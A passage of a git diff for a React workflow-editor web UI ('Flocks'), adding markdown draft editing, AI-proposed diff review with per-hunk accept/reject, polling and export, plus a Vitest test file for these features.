-        setPanelWidth(Math.min(panelMax, Math.max(PANEL_MIN, dragStartWidth.current + delta)));
+        setPanelWidth(Math.min(panelMax, Math.max(SIDE_PANEL_MIN_WIDTH, dragStartWidth.current + delta)));
       };
       const onUp = () => {
         dragging.current = false;
@@ -70,6 +263,284 @@ export default function WorkflowCreate() {
     setWorkflow(newWorkflow);
   }, []);
 
+  const handleWorkflowUpdated = useCallback((updatedWorkflow: Workflow) => {
+    setWorkflow(updatedWorkflow);
+  }, []);
+
+  useEffect(() => { // Poll the current workflow every WORKFLOW_REFRESH_MS while one is loaded.
+    if (!workflow) return;
+    let disposed = false; // Set by cleanup so late responses are ignored.
+    const timer = window.setInterval(async () => { // NOTE(review): no in-flight guard, so slow requests can overlap and apply out of order — confirm acceptable.
+      try {
+        const response = await workflowAPI.get(workflow.id);
+        if (!disposed) {
+          setWorkflow(response.data);
+        }
+      } catch {
+        // The workflow may still be settling on disk; the next poll can recover.
+      }
+    }, WORKFLOW_REFRESH_MS);
+    return () => {
+      disposed = true;
+      window.clearInterval(timer);
+    };
+  }, [workflow?.id]); // Keyed on the id only, so replacing the workflow object does not restart the timer.
+
+  useEffect(() => { // Keeps the markdown editor state (draft, base, diff, mode, tab) in step with `workflow`.
+    if (!workflow) {
+      editDocWorkflowIdRef.current = null;
+      return;
+    }
+    // Markdown currently carried by the workflow (markdownContent, else editMarkdownContent, else '').
+    const next = getWorkflowMarkdown(workflow);
+    const workflowIdChanged = workflow.id !== editDocWorkflowIdRef.current;
+    editDocWorkflowIdRef.current = workflow.id;
+    // Case 1: this workflow id has not been seen by the effect yet.
+    if (workflowIdChanged) {
+      if (restoredDraftForWorkflowRef.current && workflow.id === initialCreateDraft?.workflowId) { // Case 1a: a stored draft exists for this very workflow.
+        restoredDraftForWorkflowRef.current = false; // One-shot: restore only once.
+        const restoredDraft = initialCreateDraft.workflowMdDraft ?? next;
+        const restoredBase = initialCreateDraft.workflowMdBase ?? next;
+        setWorkflowMdDraft(restoredDraft);
+        setWorkflowMdBase(restoredBase);
+        setWorkflowMdDiff(initialCreateDraft.workflowMdDiff ?? null);
+        setEditDocMode(initialCreateDraft.editDocMode ?? 'edit');
+        setEditDocError(null);
+        if (restoredDraft.trim()) {
+          setCanvasTab(isValidCanvasTab(initialCreateDraft.canvasTab) ? initialCreateDraft.canvasTab : 'md');
+        }
+        return;
+      }
+      // Case 1b: no stored draft applies; adopt the workflow's markdown and, when non-empty, show it as an all-new diff.
+      setWorkflowMdDraft(next);
+      setWorkflowMdBase(next);
+      setWorkflowMdDiff(next.trim() ? { before: '', after: next } : null);
+      setEditDocMode('edit');
+      setEditDocError(null);
+      if (next.trim()) {
+        setCanvasTab('md');
+      }
+      return;
+    }
+    // Case 2: same workflow, but its markdown matches neither the base nor the local draft.
+    if (next !== workflowMdBase && next !== workflowMdDraft) { // NOTE(review): this replaces the draft, so unsaved local edits are lost here — confirm intended.
+      setWorkflowMdDraft(next);
+      setWorkflowMdBase(next);
+      setWorkflowMdDiff({ before: workflowMdBase, after: next }); // Diff is taken against the previous base, not the previous draft.
+      setEditDocMode('edit');
+      setEditDocError(null);
+      setCanvasTab('md');
+    }
+  }, [workflow, workflowMdBase, workflowMdDraft]);
+
+  const editDocDirty = workflowMdDraft !== workflowMdBase;
+  const workflowMdDiffLines = useMemo(() => (
+    workflowMdDiff ? buildLineDiff(workflowMdDiff.before, workflowMdDiff.after) : []
+  ), [workflowMdDiff]);
+  const workflowMdDiffStats = useMemo(() => ({
+    added: workflowMdDiffLines.filter((line) => line.type === 'add').length,
+    removed: workflowMdDiffLines.filter((line) => line.type === 'remove').length,
+  }), [workflowMdDiffLines]);
+  const workflowMdDiffHunks = useMemo(() => (
+    workflowMdDiff ? buildTextDiffHunks(workflowMdDiff.before, workflowMdDiff.after) : []
+  ), [workflowMdDiff]);
+
+  const persistWorkflowMarkdown = useCallback(async (content: string) => {
+    if (!workflow) return content;
+    const normalized = content ? (content.endsWith('\n') ? content : `${content}\n`) : '';
+    const response = await workflowAPI.update(workflow.id, {
+      markdownContent: normalized,
+    });
+    const updated = {
+      ...response.data,
+      markdownContent: response.data.markdownContent ?? normalized,
+      editMarkdownContent: response.data.editMarkdownContent ?? response.data.markdownContent ?? normalized,
+    };
+    setWorkflow(updated);
+    return updated.markdownContent ?? normalized;
+  }, [workflow]);
+
+  const handleExportEditDoc = useCallback(() => {
+    // Nothing to download while the draft is empty or whitespace-only.
+    if (workflowMdDraft.trim().length === 0) return;
+    const objectUrl = URL.createObjectURL(new Blob([workflowMdDraft], { type: 'text/markdown' }));
+    const fileName = `${workflow?.id || 'workflow'}.md`;
+    const link = Object.assign(document.createElement('a'), { href: objectUrl, download: fileName });
+    // Trigger the download through a detached anchor, then release the blob URL.
+    link.click();
+    URL.revokeObjectURL(objectUrl);
+  }, [workflow?.id, workflowMdDraft]);
+
+  const handleSaveEditDoc = useCallback(async () => {
+    if (!workflow || editDocSaving) return;
+    setEditDocSaving(true);
+    setEditDocError(null);
+    try {
+      const saved = await persistWorkflowMarkdown(workflowMdDraft);
+      setWorkflowMdDraft(saved);
+      setWorkflowMdBase(saved);
+      setWorkflowMdDiff(null);
+      setEditDocMode('preview');
+    } catch (err: unknown) {
+      setEditDocError(extractErrorMessage(err));
+    } finally {
+      setEditDocSaving(false);
+    }
+  }, [editDocSaving, persistWorkflowMarkdown, workflow, workflowMdDraft]);
+
+  const buildEditDocGenerationPrompt = useCallback(() => {
+    if (workflow) {
+      const workflowDir = workflow.source === 'global'
+        ? `~/.flocks/plugins/workflows/${workflow.id}/`
+        : `.flocks/plugins/workflows/${workflow.id}/`;
+
+      return t('detail.generateEditDocPrompt', {
+        name: workflow.name,
+        dir: workflowDir,
+        mdPath: `${workflowDir}workflow.md`,
+        jsonPath: `${workflowDir}workflow.json`,
+        workflowJson: JSON.stringify(workflow.workflowJson, null, 2),
+      });
+    }
+
+    return t('create.chat.generateEditDocPrompt', {
+      editDocContent: workflowMdDraft,
+    });
+  }, [t, workflow, workflowMdDraft]);
+
+  const launchEditDocGeneration = useCallback(() => {
+    // Request ids come from a counter kept in a ref; it is advanced once the request is queued.
+    const requestId = chatLaunchSeqRef.current + 1;
+    setPanelOpen(true);
+    setCanvasTab('md');
+    setEditDocMode('edit');
+    const prompt = buildEditDocGenerationPrompt();
+    const displayLabel = t('detail.generateEditDoc');
+    setChatLaunchRequest({ id: requestId, prompt, displayLabel });
+    chatLaunchSeqRef.current = requestId;
+  }, [buildEditDocGenerationPrompt, t]);
+
+  const handleGenerateEditDoc = useCallback(() => {
+    if (!workflowMdDraft.trim() || !workflow) {
+      launchEditDocGeneration();
+      return;
+    }
+
+    const next = buildWorkflowMarkdown(workflow);
+    setWorkflowMdDraft(next);
+    setWorkflowMdDiff(null);
+    setEditDocMode('edit');
+    setEditDocError(null);
+  }, [launchEditDocGeneration, workflow, workflowMdDraft]);
+
+  const buildWorkflowGenerationPrompt = useCallback((editDocContent: string) => {
+    if (workflow) {
+      const workflowDir = workflow.source === 'global'
+        ? `~/.flocks/plugins/workflows/${workflow.id}/`
+        : `.flocks/plugins/workflows/${workflow.id}/`;
+
+      return t('detail.generateWorkflowPrompt', {
+        name: workflow.name,
+        dir: workflowDir,
+        mdPath: `${workflowDir}workflow.md`,
+        jsonPath: `${workflowDir}workflow.json`,
+        editDocContent,
+      });
+    }
+
+    return t('create.chat.generateWorkflowPrompt', {
+      editDocContent,
+    });
+  }, [t, workflow]);
+
+  const handleGenerateWorkflow = useCallback(() => {
+    const content = workflowMdDraft.trim() ? workflowMdDraft : '';
+    if (!content) return;
+
+    setPanelOpen(true);
+    setChatLaunchRequest({
+      id: chatLaunchSeqRef.current + 1,
+      prompt: buildWorkflowGenerationPrompt(content),
+      displayLabel: t('detail.generateWorkflow'),
+    });
+    chatLaunchSeqRef.current += 1;
+  }, [buildWorkflowGenerationPrompt, t, workflowMdDraft]);
+
+  useEffect(() => {
+    if (!workflow || workflowMdDraft.trim() || !hasWorkflowJsonDefinition(workflow)) return;
+    if (missingMarkdownAutoLaunchRef.current === workflow.id) return;
+    missingMarkdownAutoLaunchRef.current = workflow.id;
+    launchEditDocGeneration();
+  }, [launchEditDocGeneration, workflow, workflowMdDraft]);
+
+  const handleChatLaunchRequestHandled = useCallback((requestId: number) => {
+    setChatLaunchRequest((current) => (
+      current?.id === requestId ? null : current
+    ));
+  }, []);
+
+  const handleAcceptEditDocDiff = useCallback(() => {
+    setWorkflowMdDiff(null);
+    setEditDocError(null);
+  }, []);
+
+  const handleAcceptEditDocDiffHunk = useCallback((hunk: TextDiffHunk) => {
+    if (!workflowMdDiff) return;
+    const nextBefore = acceptTextDiffHunk(workflowMdDiff.before, hunk);
+    if (nextBefore === workflowMdDiff.after) {
+      setWorkflowMdDiff(null);
+    } else {
+      setWorkflowMdDiff({
+        before: nextBefore,
+        after: workflowMdDiff.after,
+      });
+    }
+    setEditDocError(null);
+  }, [workflowMdDiff]);
+
+  const handleRejectEditDocDiff = useCallback(async () => {
+    if (!workflowMdDiff || editDocReviewing) return;
+    const content = workflowMdDiff.before;
+    setEditDocReviewing('reject');
+    setEditDocError(null);
+    try {
+      const saved = workflow ? await persistWorkflowMarkdown(content) : content;
+      setWorkflowMdDraft(saved);
+      setWorkflowMdBase(saved);
+      setWorkflowMdDiff(null);
+      setEditDocMode('edit');
+    } catch (err: unknown) {
+      setEditDocError(extractErrorMessage(err));
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocReviewing, persistWorkflowMarkdown, workflow, workflowMdDiff]);
+
+  const handleRejectEditDocDiffHunk = useCallback(async (hunk: TextDiffHunk) => {
+    if (!workflowMdDiff || editDocReviewing) return;
+    const content = rejectTextDiffHunk(workflowMdDiff.after, hunk);
+    setEditDocReviewing(`reject:${hunk.id}`);
+    setEditDocError(null);
+    try {
+      const saved = workflow ? await persistWorkflowMarkdown(content) : content;
+      setWorkflowMdDraft(saved);
+      setWorkflowMdBase(saved);
+      if (saved === workflowMdDiff.before) {
+        setWorkflowMdDiff(null);
+      } else {
+        setWorkflowMdDiff({
+          before: workflowMdDiff.before,
+          after: saved,
+        });
+      }
+      setEditDocMode('edit');
+    } catch (err: unknown) {
+      setEditDocError(extractErrorMessage(err));
+    } finally {
+      setEditDocReviewing(null);
+    }
+  }, [editDocReviewing, persistWorkflowMarkdown, workflow, workflowMdDiff]);
+
   return (
     <div className="flex flex-col h-full bg-gray-50 overflow-hidden">
       <CreateTopBar
@@ -78,29 +549,101 @@ export default function WorkflowCreate() {
         onTogglePanel={() => setPanelOpen((v) => !v)}
       />
 
-      <div className="flex flex-1 min-h-0 overflow-hidden">
-        {/* 左侧画布 */}
-        <div className="flex-1 min-w-0 relative">
-          <FlowCanvas
-            workflowJson={workflow?.workflowJson ?? EMPTY_WORKFLOW_JSON}
-            editable={false}
-          />
-          {/* 空状态遮罩 */}
-          {!workflow && (
-            <div className="absolute inset-0 flex flex-col items-center justify-center gap-4 pointer-events-none">
-              <div className="flex flex-col items-center gap-3 bg-white/90 backdrop-blur-sm rounded-2xl border border-dashed border-gray-300 px-10 py-8 shadow-sm">
-                <div className="flex items-center justify-center w-14 h-14 rounded-xl bg-gray-50 border border-gray-200">
-                  <WorkflowIcon className="w-7 h-7 text-gray-300" />
-                </div>
-                <div className="text-center">
-                  <p className="text-sm font-medium text-gray-500">{t('create.canvasTitle')}</p>
-                  <p className="text-xs text-gray-400 mt-1 max-w-[200px] leading-relaxed">
-                    {t('create.canvasHint')}
-                  </p>
+      <div className="relative isolate flex flex-1 min-h-0 overflow-hidden">
+        {/* 左侧编辑/预览区 */}
+        <div className="relative z-0 flex flex-1 min-w-0 flex-col overflow-hidden">
+          <div className="flex flex-shrink-0 items-center border-b border-gray-200 bg-white px-2">
+            {CANVAS_TABS.map((tab) => (
+              <button
+                key={tab.id}
+                type="button"
+                onClick={() => setCanvasTab(tab.id)}
+                className={`relative flex items-center gap-1.5 px-3 py-2.5 text-xs font-medium transition-colors ${
+                  canvasTab === tab.id
+                    ? 'text-red-600'
+                    : 'text-gray-500 hover:text-gray-700'
+                }`}
+              >
+                {tab.icon}
+                {tab.label}
+                {canvasTab === tab.id && (
+                  <span className="absolute bottom-0 left-0 right-0 h-0.5 rounded-full bg-red-600" />
+                )}
+              </button>
+            ))}
+          </div>
+
+          <div className="relative min-h-0 flex-1">
+            <div className={canvasTab === 'flow' ? 'absolute inset-0' : 'hidden'}>
+              <FlowCanvas
+                workflowJson={workflow?.workflowJson ?? EMPTY_WORKFLOW_JSON}
+                editable={false}
+              />
+              {!workflow && (
+                <div className="pointer-events-none absolute inset-0 flex flex-col items-center justify-center gap-4">
+                  <div className="flex flex-col items-center gap-3 rounded-2xl border border-dashed border-gray-300 bg-white/90 px-10 py-8 shadow-sm backdrop-blur-sm">
+                    <div className="flex h-14 w-14 items-center justify-center rounded-xl border border-gray-200 bg-gray-50">
+                      <WorkflowIcon className="h-7 w-7 text-gray-300" />
+                    </div>
+                    <div className="text-center">
+                      <p className="text-sm font-medium text-gray-500">{t('create.canvasTitle')}</p>
+                      <p className="mt-1 max-w-[200px] text-xs leading-relaxed text-gray-400">
+                        {t('create.canvasHint')}
+                      </p>
+                    </div>
+                  </div>
                 </div>
-              </div>
+              )}
             </div>
-          )}
+
+            {canvasTab === 'md' && (
+              <WorkflowDocumentPanel
+                editorId="workflow-create-edit-doc"
+                mode={editDocMode}
+                value={workflowMdDraft}
+                dirty={editDocDirty}
+                saving={editDocSaving}
+                error={editDocError}
+                resetDisabled={false}
+                saveDisabled={!workflow || !editDocDirty || editDocSaving}
+                generateWorkflowDisabled={!workflowMdDraft.trim()}
+                onModeChange={setEditDocMode}
+                onChange={(value) => {
+                  setWorkflowMdDraft(value);
+                  setWorkflowMdDiff(null);
+                  setEditDocError(null);
+                }}
+                onResetDocument={handleGenerateEditDoc}
+                onSave={() => void handleSaveEditDoc()}
+                onGenerateWorkflow={handleGenerateWorkflow}
+                onDownload={handleExportEditDoc}
+                diffReview={
+                  workflowMdDiff ? (
+                    <WorkflowMarkdownDiffReview
+                      lines={workflowMdDiffLines}
+                      hunks={workflowMdDiffHunks}
+                      added={workflowMdDiffStats.added}
+                      removed={workflowMdDiffStats.removed}
+                      reviewingId={editDocReviewing}
+                      disabled={editDocSaving || editDocReviewing !== null}
+                      onAccept={handleAcceptEditDocDiff}
+                      onReject={() => void handleRejectEditDocDiff()}
+                      onAcceptHunk={handleAcceptEditDocDiffHunk}
+                      onRejectHunk={(hunk) => void handleRejectEditDocDiffHunk(hunk)}
+                    />
+                  ) : undefined
+                }
+              />
+            )}
+
+            {canvasTab === 'json' && (
+              <div className="absolute inset-0 overflow-y-auto bg-gray-900 p-4">
+                <pre className="font-mono text-xs leading-relaxed text-gray-200 whitespace-pre">
+                  {workflow ? JSON.stringify(workflow.workflowJson, null, 2) : ''}
+                </pre>
+              </div>
+            )}
+          </div>
         </div>
 
         {/* 拖动分隔条 */}
@@ -120,6 +663,12 @@ export default function WorkflowCreate() {
           open={panelOpen}
           width={panelWidth}
           onWorkflowCreated={handleWorkflowCreated}
+          onWorkflowUpdated={handleWorkflowUpdated}
+          initialChatSessionId={chatSessionId}
+          creationStartedAt={creationStartedAt}
+          onChatSessionChange={setChatSessionId}
+          chatLaunchRequest={chatLaunchRequest}
+          onChatLaunchRequestHandled={handleChatLaunchRequestHandled}
         />
       </div>
     </div>
diff --git a/webui/src/pages/WorkflowDetail/FlocksHelpButton.test.tsx b/webui/src/pages/WorkflowDetail/FlocksHelpButton.test.tsx
new file mode 100644
index 000000000..c7366cdc5
--- /dev/null
+++ b/webui/src/pages/WorkflowDetail/FlocksHelpButton.test.tsx
@@ -0,0 +1,367 @@
+import { fireEvent, render, screen, waitFor, within } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { MemoryRouter, Route, Routes } from 'react-router-dom';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import { ConfirmProvider } from '@/components/common/ConfirmDialog';
+import WorkflowDetail from './index';
+
+const {
+  mockGetWorkflow,
+  mockUpdateWorkflow,
+  mockSendSessionMessage,
+  originalMarkdown,
+  twoHunkMarkdown,
+  topOnlyMarkdown,
+} = vi.hoisted(() => ({
+  mockGetWorkflow: vi.fn(),
+  mockUpdateWorkflow: vi.fn(),
+  mockSendSessionMessage: vi.fn(),
+  originalMarkdown: '# old\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast\n',
+  twoHunkMarkdown: '# new\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast changed\n',
+  topOnlyMarkdown: '# new\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast\n',
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: {
+    get: mockGetWorkflow,
+    update: mockUpdateWorkflow,
+    delete: vi.fn(),
+    export: vi.fn(),
+  },
+}));
+
+vi.mock('@/api/session', () => ({
+  sessionApi: {
+    sendMessage: mockSendSessionMessage,
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string) => {
+      const translations: Record<string, string> = {
+        'detail.flocksHelp': '让Rex帮你配置、编辑工作流',
+        'detail.flocksHelpTitle': '让Rex帮你配置、编辑工作流',
+        'detail.resetLayout': '重置布局',
+        'detail.canvasTabs.flow': '流程图',
+        'detail.canvasTabs.md': '流程说明',
+        'detail.canvasTabs.json': '工作流文件',
+        'detail.editDocTitle': 'workflow.md',
+        'detail.editDocModeEdit': '编辑',
+        'detail.editDocModePreview': '预览',
+        'detail.editDocDiffTitle': 'AI 修改差异',
+        'detail.editDocDiffReviewDesc': '接受会保留当前内容；拒绝会回滚到修改前内容。',
+        'detail.editDocDiffHunkTitle': '变更 {{index}}',
+        'detail.editDocDiffAdded': '新增',
+        'detail.editDocDiffRemoved': '删除',
+        'detail.editDocDiffAccept': '接受',
+        'detail.editDocDiffReject': '拒绝',
+        'detail.editDocDiffAcceptHunk': '接受此段',
+        'detail.editDocDiffRejectHunk': '拒绝此段',
+        'detail.editDocDiffRejecting': '回滚中',
+        'detail.editDocDiffAcceptHunkSuccess': '已接受此段',
+        'detail.editDocDiffRejectHunkSuccess': '已拒绝此段',
+        'detail.editDocDiffRejectSuccess': '已拒绝',
+        'detail.editDocDiffRejectFailed': '拒绝失败',
+        'detail.editDocDiffRejectHunkFailed': '拒绝此段失败',
+        'detail.editDocTextareaLabel': '编辑 workflow.md',
+        'detail.editDocPlaceholder': '在这里编辑 workflow.md...',
+        'detail.downloadMd': '下载说明文件',
+        'detail.downloadMdTitle': '下载当前说明文件',
+        'detail.generateEditDocTitle': '生成说明',
+        'detail.regenerateEditDocTitle': '重置 workflow.md',
+        'detail.regenerateEditDoc': '重置文档',
+        'detail.generateEditDoc': '生成说明',
+        'detail.editDocSave': '保存',
+        'detail.editDocSaving': '保存中',
+        'detail.generateWorkflow': '生成工作流',
+        'detail.generateWorkflowTitle': '基于 workflow.md 生成 workflow.json',
+        'detail.generateEditDocPrompt': '用户点击了「生成说明」。基于 {{jsonPath}} 生成 workflow.md。\n{{workflowJson}}',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+vi.mock('./TopBar', () => ({
+  default: ({ onTogglePanel }: { onTogglePanel: () => void }) => (
+    <button type="button" onClick={onTogglePanel}>toggle panel</button>
+  ),
+}));
+
+vi.mock('./FlowCanvas', () => ({
+  default: () => <div data-testid="flow-canvas">flow canvas</div>,
+}));
+
+vi.mock('./RightPanel', () => ({
+  default: ({
+    open,
+    activeTab,
+    workflow,
+    onWorkflowUpdated,
+    onSessionChange,
+    chatLaunchRequest,
+  }: {
+    open: boolean;
+    activeTab?: string;
+    workflow: ReturnType<typeof makeWorkflow>;
+    onWorkflowUpdated?: (workflow: ReturnType<typeof makeWorkflow>) => void;
+    onSessionChange?: (sessionId: string | null) => void;
+    chatLaunchRequest?: { prompt: string; displayLabel?: string } | null;
+  }) => (
+    <div
+      data-testid="right-panel"
+      data-open={open ? 'open' : 'closed'}
+      data-active-tab={activeTab}
+      data-launch-label={chatLaunchRequest?.displayLabel ?? ''}
+    >
+      right panel
+      <button
+        type="button"
+        onClick={() => onSessionChange?.('session-1')}
+      >
+        attach workflow chat session
+      </button>
+      <button
+        type="button"
+        onClick={() => onWorkflowUpdated?.({
+          ...workflow,
+          updatedAt: workflow.updatedAt + 1,
+          markdownContent: twoHunkMarkdown,
+          editMarkdownContent: twoHunkMarkdown,
+        })}
+      >
+        simulate AI markdown update
+      </button>
+      <button
+        type="button"
+        onClick={() => onWorkflowUpdated?.({
+          ...workflow,
+          updatedAt: workflow.updatedAt + 1,
+          markdownContent: topOnlyMarkdown,
+          editMarkdownContent: topOnlyMarkdown,
+        })}
+      >
+        simulate top-only markdown update
+      </button>
+    </div>
+  ),
+}));
+
+vi.mock('./NodeInfoPanel', () => ({
+  default: () => <div>node info</div>,
+}));
+
+function makeWorkflow() { // Baseline fixture: draft workflow 'wf-1' with one python node and originalMarkdown as its document.
+  return {
+    id: 'wf-1',
+    name: '测试工作流',
+    category: 'default',
+    status: 'draft' as const,
+    createdAt: 0,
+    updatedAt: 0,
+    stats: {
+      callCount: 0,
+      successCount: 0,
+      errorCount: 0,
+      totalRuntime: 0,
+      avgRuntime: 0,
+      thumbsUp: 0,
+      thumbsDown: 0,
+    },
+    workflowJson: {
+      start: 'node-1',
+      nodes: [{ id: 'node-1', type: 'python' as const }],
+      edges: [],
+    },
+    markdownContent: originalMarkdown, // Both markdown fields start from the same text.
+    editMarkdownContent: originalMarkdown,
+  };
+}
+
+function renderDetail() { // Renders WorkflowDetail at /workflows/wf-1 inside MemoryRouter and ConfirmProvider.
+  return render(
+    <MemoryRouter initialEntries={['/workflows/wf-1']}>
+      <ConfirmProvider>
+        <Routes>
+          <Route path="/workflows/:id" element={<WorkflowDetail />} />
+        </Routes>
+      </ConfirmProvider>
+    </MemoryRouter>,
+  );
+}
+
+describe('Flocks help button', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    mockGetWorkflow.mockResolvedValue({ data: makeWorkflow() });
+    mockUpdateWorkflow.mockImplementation(async (_workflowId: string, payload: { markdownContent?: string }) => ({
+      data: {
+        ...makeWorkflow(),
+        markdownContent: payload.markdownContent ?? '',
+        editMarkdownContent: payload.markdownContent ?? '',
+      },
+    }));
+    mockSendSessionMessage.mockResolvedValue({});
+  });
+  // The help button must reopen a closed right panel and select the chat tab.
+  it('opens the right panel on the AI edit tab', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas'); // wait until the canvas is rendered
+    await user.click(screen.getByRole('button', { name: 'toggle panel' })); // close the panel first
+
+    await waitFor(() => {
+      expect(screen.getByTestId('right-panel')).toHaveAttribute('data-open', 'closed');
+    });
+
+    await user.click(screen.getByRole('button', { name: '让Rex帮你配置、编辑工作流' }));
+
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-open', 'open');
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-active-tab', 'chat');
+  });
+  // Clicking '生成工作流' ("generate workflow") from the '流程说明' ("process description") view should open the chat tab with that same launch label.
+  it('uses an instruction label when launching workflow regeneration from the editor', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: '流程说明' }));
+    await user.click(screen.getByRole('button', { name: '生成工作流' }));
+
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-active-tab', 'chat');
+    expect(screen.getByTestId('right-panel')).toHaveAttribute('data-launch-label', '生成工作流');
+  });
+  // When the loaded workflow has no markdown, the help button should launch chat with the '生成说明' ("generate description") label.
+  it('launches workflow.md generation first when entering the workbench without a markdown document', async () => {
+    const user = userEvent.setup();
+    mockGetWorkflow.mockResolvedValue({
+      data: {
+        ...makeWorkflow(),
+        markdownContent: undefined,
+        editMarkdownContent: undefined,
+      },
+    });
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: '让Rex帮你配置、编辑工作流' }));
+
+    await waitFor(() => {
+      expect(screen.getByTestId('right-panel')).toHaveAttribute('data-active-tab', 'chat');
+      expect(screen.getByTestId('right-panel')).toHaveAttribute('data-launch-label', '生成说明');
+    });
+  });
+  // An AI markdown update should show an inline per-hunk review (no separate Diff button, no editor textbox) and allow rejecting one hunk.
+  it('shows AI markdown diff inline above the editor and can reject it', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'simulate AI markdown update' }));
+
+    expect(await screen.findByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: 'Diff' })).not.toBeInTheDocument();
+    expect(screen.getByTestId('workflow-md-diff-review')).toBeInTheDocument();
+    expect(screen.queryByRole('textbox', { name: '编辑 workflow.md' })).not.toBeInTheDocument();
+    expect(screen.getByText('keep 3')).toBeInTheDocument();
+    // The simulated update is expected to yield two hunks, each with its own accept/reject button.
+    expect(screen.getAllByRole('button', { name: '接受此段' })).toHaveLength(2);
+    expect(screen.getAllByRole('button', { name: '拒绝此段' })).toHaveLength(2);
+
+    await user.click(screen.getAllByRole('button', { name: '拒绝此段' })[0]);
+    // Rejecting the first hunk should save markdown that keeps '# old' (presumably the original heading) alongside 'last changed'.
+    await waitFor(() => {
+      expect(mockUpdateWorkflow).toHaveBeenCalledWith('wf-1', {
+        markdownContent: '# old\n\nkeep 1\nkeep 2\nkeep 3\nkeep 4\n\nlast changed\n',
+      });
+    });
+    expect(screen.getByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.getAllByRole('button', { name: '拒绝此段' })).toHaveLength(1);
+  });
+  // The line-number gutter should follow the editor content: up to 8 initially (presumably originalMarkdown's line count), 3 after the edit.
+  it('shows synchronized line numbers while editing workflow.md', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: '流程说明' }));
+    await user.click(screen.getByRole('button', { name: '编辑' }));
+
+    const lineNumbers = within(screen.getByTestId('workflow-md-line-numbers'));
+    expect(lineNumbers.getByText('1')).toBeInTheDocument();
+    expect(lineNumbers.getByText('8')).toBeInTheDocument();
+
+    const editor = screen.getByRole('textbox', { name: '编辑 workflow.md' });
+    fireEvent.change(editor, { target: { value: 'first\nsecond\nthird' } });
+
+    await waitFor(() => {
+      expect(within(screen.getByTestId('workflow-md-line-numbers')).getByText('3')).toBeInTheDocument();
+    });
+    expect(editor).toHaveValue('first\nsecond\nthird');
+  });
+  // A single-hunk diff should still render the unchanged lines that lie outside that hunk.
+  it('shows unchanged markdown lines outside a single diff hunk', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'simulate top-only markdown update' }));
+
+    expect(await screen.findByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.getAllByRole('button', { name: '接受此段' })).toHaveLength(1);
+    expect(screen.getByText('keep 3')).toBeInTheDocument();
+    expect(screen.getByText('keep 4')).toBeInTheDocument();
+    expect(screen.getByText('last')).toBeInTheDocument();
+  });
+  // Accepting the whole diff should send a noReply text message recording the decision to the attached chat session.
+  it('persists an accepted markdown diff review result into the workflow chat session', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'attach workflow chat session' }));
+    await user.click(screen.getByRole('button', { name: 'simulate top-only markdown update' }));
+    await screen.findByText('AI 修改差异');
+    await user.click(screen.getByRole('button', { name: '接受' }));
+
+    await waitFor(() => {
+      expect(mockSendSessionMessage).toHaveBeenCalledWith('session-1', {
+        parts: [{
+          type: 'text',
+          text: expect.stringContaining('decision: accepted'),
+        }],
+        noReply: true,
+      });
+    });
+    const payload = mockSendSessionMessage.mock.calls[0][1].parts[0].text; // text part of the first recorded call
+    expect(payload).toContain('proposed_change_applied: true');
+    expect(payload).toContain('review_state: completed');
+  });
+  // Rejecting the whole diff should send a noReply text message recording the rejection to the attached chat session.
+  it('persists a rejected markdown diff review result into the workflow chat session', async () => {
+    const user = userEvent.setup();
+    renderDetail();
+
+    await screen.findByTestId('flow-canvas');
+    await user.click(screen.getByRole('button', { name: 'attach workflow chat session' }));
+    await user.click(screen.getByRole('button', { name: 'simulate top-only markdown update' }));
+    await screen.findByText('AI 修改差异');
+    await user.click(screen.getByRole('button', { name: '拒绝' }));
+
+    await waitFor(() => {
+      expect(mockSendSessionMessage).toHaveBeenCalledWith('session-1', {
+        parts: [{
+          type: 'text',
+          text: expect.stringContaining('decision: rejected'),
+        }],
+        noReply: true,
+      });
+    });
+    const payload = mockSendSessionMessage.mock.calls[0][1].parts[0].text; // text part of the first recorded call
+    expect(payload).toContain('proposed_change_applied: false');
+    expect(payload).toContain('workflow.md was restored to the previous content');
+  });
+});
diff --git a/webui/src/pages/WorkflowDetail/FlowCanvas.tsx b/webui/src/pages/WorkflowDetail/FlowCanvas.tsx
index c7803149e..e2053b563 100644
--- a/webui/src/pages/WorkflowDetail/FlowCanvas.tsx
+++ b/webui/src/pages/WorkflowDetail/FlowCanvas.tsx
@@ -1,10 +1,9 @@
-import { useState, useCallback, useEffect, memo } from 'react';
+import { useState, useCallback, useContext, useEffect, useMemo, useRef, memo, type ReactNode } from 'react';
 import { useTranslation } from 'react-i18next';
 import {
   ReactFlow,
   Node,
   Edge,
-  Controls,
   Background,
   BackgroundVariant,
   MiniMap,
@@ -18,8 +17,9 @@ import {
   NodeProps,
 } from '@xyflow/react';
 import '@xyflow/react/dist/style.css';
